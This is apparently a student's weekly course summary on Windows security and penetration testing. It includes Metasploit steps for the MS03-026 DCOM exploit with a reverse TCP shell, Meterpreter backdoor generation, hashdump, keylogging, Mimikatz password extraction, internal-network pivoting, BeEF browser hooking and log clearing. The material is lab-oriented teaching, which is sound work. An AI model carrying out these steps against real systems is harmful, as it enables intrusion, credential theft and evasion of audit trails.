zoukankan      html  css  js  c++  java
  • 20169203 2016-2017-2 《网络攻防实践》第七周学习总结

    教材学习内容总结

    第七章 Windows安全攻防
    7.1 win基本框架

    Windows操作系统内核的基本模块:Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码、系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。Windows的虚拟内存空间分为系统核心内存区间和用户内存区间。在32位的Windows系统中,2GB4GB区间为系统核心内存,0GB2GB区间为用户态内存
    Windows网络组件模块:

    各种网卡硬件的设备驱动程序
    NDIS库及miniport驱动程序
    TDI传输层,也称为网络协议驱动
    网络API DLL及TDI客户端
    网络应用程序与服务进程
    windows操作系统的基本结构分为运行于处理器特权模式的操作系统内核,以及运行在处理器非特权模式的用户空间代码。
    windows操作系统内核的基本模块包括:Windows执行体,windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码、系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL、Windows进程和线程管理机制、windows内存管理机制、windows文件管理机制、windows注册表管理机制、windows的网络机制。
    7.2 win安全体系

    Windows操作系统的安全设计目标是采用一致的、健壮的、基于对象的安全模型
    Windows操作系统基于引用监控器模型(RM)来实现基本的对象安全模型
    引用监控器模型(RM)最为核心的是位于内核中的SRM安全引用监控器,以及位于用户态的LSASS安全服务

    SD安全描述符主要由如下主要属性组成。
    1.Owner SID:对象所有者的SID安全标识符。
    2.Group SID:对象所在基本用户组的SID安全标识符。
    3.DACL自主访问控制列表:指明了那些安全主体可以何种方式来访问该对象。
    4.SACL 系统审计访问控制列表:指明了那些主体发起的那些访问操作需要被审计。
    7.3 win远程安全攻防技术

    Windows系统的安全漏洞生命周期:

    Windows安全漏洞发现、利用与修补过程
    安全漏洞公开披露信息库
    针对特定目标的渗透测试攻击过程
    使用Metasploit软件实施渗透测试
    Windows远程口令猜测与破解攻击:

    远程口令自猜测
    远程口令字交换通信窃听与破解
    远程口令猜测与破解防范措施
    Windows网络服务远程渗透攻击:

    针对NetBIOS网络服务的著名漏洞及攻击
    针对SMB网络服务的著名漏洞及攻击
    针对MSRPC网络服务的著名漏洞及攻击
    针对Windows系统上微软网络服务的远程渗透攻击
    针对Windows系统上第三方网络服务的远程渗透攻击
    7.4 win本地安全攻防技术

    Windows本地特权提升
    Windows敏感信息窃取: Windows系统口令字密文提取技术、Windows系统口令字破解技术、用户敏感数据窃取、本地敏感信息窃取防范措施
    Windows消踪灭迹: 关闭审计功能、清理事件日志

    Windows远程安全攻防技术:远程口令猜测与破解攻击、攻破Windows网络服务、攻击Windows客户端及用户。
    windows系统的安全漏洞生命周期:Windows安全漏洞发现、利用和修补过程。安全漏洞公开纰漏信息库、针对特定目标的渗透测试攻击过程、使用Metasploit软件实施渗透测试
    使用Metasploit Console终端实施渗透测试过程。
    1.use exploit/windows/dcerpc/ms03_026_dcom
    2.set PLAYLOAD generic/shell——reverse_tcp
    3.set LHOST 192.168.200.2;set RHOST 192.168.200.124.

    教材学习中遇到的问题及解决办法

    视频学习

    漏洞利用之Metasploit基础


    对于其中的各个模块介绍
    Auxiliary:辅助模块
    encoders:供msfencode编码工具使用,具体可以使用msfencode -l
    exploits:攻击模块,每个介绍msf的文章都会提到那个ms08_067_netapi,它就在这个目录
    payloads:这里面列出的是攻击载荷,也就是攻击成功之后执行的代码。比如常设置的windows/meterpreter/reverse_tcp就在这个文件夹下
    post:后渗透阶段模块,在获得metasploit的shell之后可以使用的攻击代码。比如常用的hashdump、arp_scanner就在这里
    发现漏洞,搜索exploit
    首先对目标进行版本扫描

    在刚刚打开的msf中搜索看Metasploit的ftp服务是否有漏洞

    进入exploit,查看参数

    配置好信息,之后输入命令exploit 进行攻击

    kali漏洞利用之Meterpreter介绍

    Meterpreter是metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpretershell的链接

    Meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展命令组成,极大地丰富了攻击方式。其有很多有用的功能,如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe.、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程机器的网络接口和IP地址等信息

    常用的命令:background:将当前会话放置后台;load/use:加载模块;Interact:切换进一个信道;migrate:迁移进程;run:执行一个已有的模块,这里要说的是是输入run之后按两下tab键,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等;Resource:执行一个已有的rc脚本常用的Meterpreter类型为:payload/windows/meterpreter/reverse_tcp
    meterpreter 是metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出成功后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpretershell.
    meterpreter作为后渗透模块有多中类型,并且命令由核心命令和扩展库命令组成,极大地丰富了攻击方式,其有很多有用的功能,如,添加一个用户,隐藏一些东西,打开shell,得到用户密码,上传下载远程主机的文件,运行cmd.exe,捕获屏幕,得到远程控制权,捕获按键信息,清除应用程序,显示远程主机的系统信息,显示远程及其的网络接口和IP地址等信息。
    常见的命令:

    background:将当前会话放置后台
    load/use:加载模块
    interact:切换进一个信道
    migrate:迁移进程
    run:执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本。
    resource:执行一个已有的rc脚本常用的meterpreter类型为:payload/windows/meterpreter/reverse_tcp。
    攻击步骤:

    生成Meterpreter后门
    打开MSF,开启监听,选择exploit/multi/handler
    在目标机器上执行door.exe
    通过help命令查看可执行的命令
    常见命令使用,包括系统信息,抓取屏幕截图与抓取HASH等。
    目录浏览
    键盘监听
    扩展工具,load/use之后再输入help,就可以了看到有关这个模块的命令的说明了
    扩展工具之Minikatz,抓取本地密码明文

    漏洞利用之Metasploit后渗透测试

    在跳板机获取一定权限后,需要积极地向内网主机权限发展,获取指定的目标信息,探查系统的漏洞,借助Msf已经得到的Meterpreter后门,可以使后续操作更容易。

    查看当前网卡、网段信息
    添加路由表 run autoroute -s 10.0.0.1
    开Socks代理 通过使用 auxiliary/sever/socks4a模块,创建一个Socks代理,可以作为浏览器,Sqlmp,Namp等使用。
    通过Background和sessions -i可以自由切换进入Session
    输入run可以看到Meterpreter上可以做的很多命令
    获取内网信息run arp_scanner -r 10.0.0.1/24
    也可上传文件,做端口转发后续测试
    应用程序/权限维持/Tunnel工具集
    端口转发 upload lcx.exe c:

    kali漏洞利用之BeeF

    命令行下启动beef

    此时浏览器自动访问此页面http://127.0.0.1:3000/ui/authentication

    登陆到http://127.0.0.1:3000/demos/basic.html

    这个测试的demo是在访问了之后,BeEF就会hock到信息。

    HOCK持续的时间到关闭测试页面为止,在此期间,相当于被控制了,可以发送攻击命令,在Commends模块,可以完成很多任务:其中,4种颜色分别表示:绿色:该攻击模块可用,且隐蔽性强;灰色:该攻击模块可用,但隐蔽性差;橙色:该攻击模块是否可用还有待验证;红色:该攻击模块不可用
    测试攻击

    测试proxy

    遇到的问题以及解决办法

    在开启Metasploit服务时遇到问题如下:

    查找资料应该是在最新的kali命令不支持
    在kali 2.0中启动带数据库支持的MSF方式如下:
    首先启动postgresql数据库:/etc/init.d/postgresql start;或者 service postgresql start;
    初始化MSF数据库(关键步骤!):msfdb init;
    运行msfconsole:msfconsole;
    在msf中查看数据库连接状态:db_status。

    错题分析

    传输层的攻击都和TCP三次握手过程的设计缺陷有关。(false)传输层协议有TCP和UDP
    中间人攻击可以破坏信息的机密性和完整性。(true)
    入侵检测中最核心的任务是信息分析,下面的技术中对未知攻击无效的是(c)误用检测是针对已知攻击的特征库的。
    A .异常检测
    B .统计分析
    C .误用检测
    D .机器学习
    netfilter/iptables的规则表中,可以进行源IP和端口转换的是?(c)
    A .filter表
    B .trans表
    C .nat表
    D .mangle表

    参考资料

    《网络攻防技术与实践》 诸葛建伟著
    网络攻防视频

    学习进度条

    按照作业来,按时完成作业。

  • 相关阅读:
    【贪心】POJ1017:Packets
    【贪心】POJ2393:Yogurt factory
    【贪心】POJ3190:Stall Reservations
    【递归】地盘划分
    【递归与递推】青蛙过河
    【搜索】POJ1242:Rescue
    单词方阵(dfs)
    反向因子Inverse Factorial
    P1604 B进制星球
    抵制克苏恩(记忆化搜索)
  • 原文地址:https://www.cnblogs.com/lxy666666/p/6698912.html
Copyright © 2011-2022 走看看